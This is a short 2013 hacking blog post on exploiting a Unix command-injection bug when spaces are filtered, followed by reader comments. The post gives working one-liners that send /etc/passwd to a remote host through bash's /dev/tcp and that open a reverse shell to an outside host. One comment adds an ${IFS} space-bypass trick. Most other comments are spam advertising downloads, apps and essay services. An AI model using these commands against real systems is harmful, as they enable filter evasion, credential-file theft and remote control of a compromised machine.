czwartek, 10 października 2013

[EN] Unix RCE without spaces

You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it through Internet!

[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060


[host2]
zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

It looks all right ;) You can also create reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and result - sent to xxxx.pl:2222

I hope this one was useful ;)

27 komentarzy:

  1. Cool note - I've just learned about /dev/tcp recently and I was really surprised to see such a thing since I've looked at /dev quite often and had never seen it - that of course might be related to the fact, that it's not a device, it's a bash feature huh ;)

    As for spaces, ${IFS} can be used instead (field separator). I guess there was that old bug with IFS not being cleared in suid binaries calling system("/bin/something"); later on, and you would switch IFS to / and make a file called bin in cwd ;) (fixing PATH to point at . as well ofc).

    Cheers

    OdpowiedzUsuń
    Odpowiedzi
    1. Answering after month - right... ;-) Anyway thanks for reading. Solution with IFS seems to be simpler and better than "mine" ;)

      Usuń
    2. Zoczus Blog: [En] Unix Rce Without Spaces >>>>> Download Now

      >>>>> Download Full

      Zoczus Blog: [En] Unix Rce Without Spaces >>>>> Download LINK

      >>>>> Download Now

      Zoczus Blog: [En] Unix Rce Without Spaces >>>>> Download Full

      >>>>> Download LINK 6c

      Usuń
  2. good
    tanks alot

    https://chartiran.com

    OdpowiedzUsuń

  3. Thoroughly clean a new napkin constantly. Maybe, You've got to use a hand bath soft small large bathroom cloth a day. Folks who wants rinse off on daily basis, Try to decontaminate they at least one time each and every single 3 4 days. He'd a lttle bit cured upon which he recorded the dog's mare and conveyances just with respect to visit along with that typically he despatched products on CPR train trail location. The now recorded mare must have been acknowledged dark fabric pure skincare. Encountered his well-known precise indicates exercising his look and hubby experienced been extra warm, Achieving patients and / or introduction the parties at the entranceway looking at inside mainly because they remaining

    tags: Cheap Yeezy Shoes, Discount Jordan Shoes Wholesale, Yeezy Boost 350 V2 Zebra For Sale, Jordan Shoes For Sale Cheap, Real Yeezy Shoes

    .

    OdpowiedzUsuń
  4. i shared your post عکس پروفایل
    tanx for post عکس پروفایل
    tanx for post http://iuok.ir/photos.html

    OdpowiedzUsuń
  5. Have you tried this new app AWP Mode Mod Apk : this is really great.

    OdpowiedzUsuń
  6. Great Blog!
    Thanks a lot for sharing awesome articles here.keep posting like this.
    Download ios whatsapp apk

    OdpowiedzUsuń
  7. เว็บดูหนังออนไลน์ ฟรีได้ที่นี่จริงๆ

    บริการทันสมัยและหากคุณสนใจติดตามได้ที่นี่ตลอด 24 ชั่วโมง และถ้าคุณอยากรู้จักกับบริการของเรา อยากสนุกต้องนึกถึงบริการเว็บดูหนังออนไลน์ที่นี่ความบันเทิงครบรสครบทุกรูปแบบ คุณจะไม่พลาดและไม่ผิดหวังกับบริการดีๆที่เรามีให้ แบบไม่ต้องเสียค่าใช้จ่ายไม่ต้องติดตั้งอุปกรณ์ใดๆ ที่บ้านคุณถ้าคุณมีสัญญาณอินเทอร์เน็ต มีอุปกรณ์ที่เข้าอินเตอร์เน็ตได้แค่นี้ก็รับชมภาพยนตร์ทุกรูปแบบจากเราได้ทันที

    OdpowiedzUsuń
  8. Zoczus Blog: [En] Unix Rce Without Spaces >>>>> Download Now

    >>>>> Download Full

    Zoczus Blog: [En] Unix Rce Without Spaces >>>>> Download LINK

    >>>>> Download Now

    Zoczus Blog: [En] Unix Rce Without Spaces >>>>> Download Full

    >>>>> Download LINK GL

    OdpowiedzUsuń

  9. Thanks For Sharing Such beautiful information about the Blog. Your way of writing and clarifying things is very impressive I truly appreciate your writing style this is very useful.. For academic writing work, you can check my work at myassignmenthelp.com
    for more:-
    sql homework help
    spss assignment help
    griffith referencing tool
    Database management help

    OdpowiedzUsuń
  10. Do you find yourself helpless in sorting the intricacies of the classroom teachings and reproducing them through the mandated assignments that are too complex? Just sign in toEdit my paper and relax while our experts do all the required answering for you and secure A+ grades for you.

    OdpowiedzUsuń
  11. Navaratnalu is the scheme started by government of Andhra Pradesh to provide facilities to all types of people in AP. This is the dream of young CM to make all fruits of development reach people. Login procedure for ysr Pedalandariki Illu. Navaratnalu Login District Wise 2023 You can easily login to the Navaratnalu Housing website by using the following procedure. The main aim of this website is to make all the people know the information about the services provided in AP.

    OdpowiedzUsuń
  12. Your comments always strike a chord with their insight and depth. It's a pleasure to have you in our discussions.
    gmail inbox

    OdpowiedzUsuń
  13. You've truly excelled in covering this topic. Your post is a testament to your knowledge and commitment. I'll definitely be returning for more of your insightful work.
    www.hotmail.com

    OdpowiedzUsuń
  14. I liked how you looked at things. It is consistent with a conversation I started at gb whatsapp. I would value your viewpoint.

    OdpowiedzUsuń
  15. Your post was a catalyst for innovation! Now I'm ready to spark new ideas and explore innovative content on outlook business email.

    OdpowiedzUsuń
  16. Exploration was sparked by your message! I'm now prepared to explore outlook signup exploration-driven content and take a leap into the unknown.

    OdpowiedzUsuń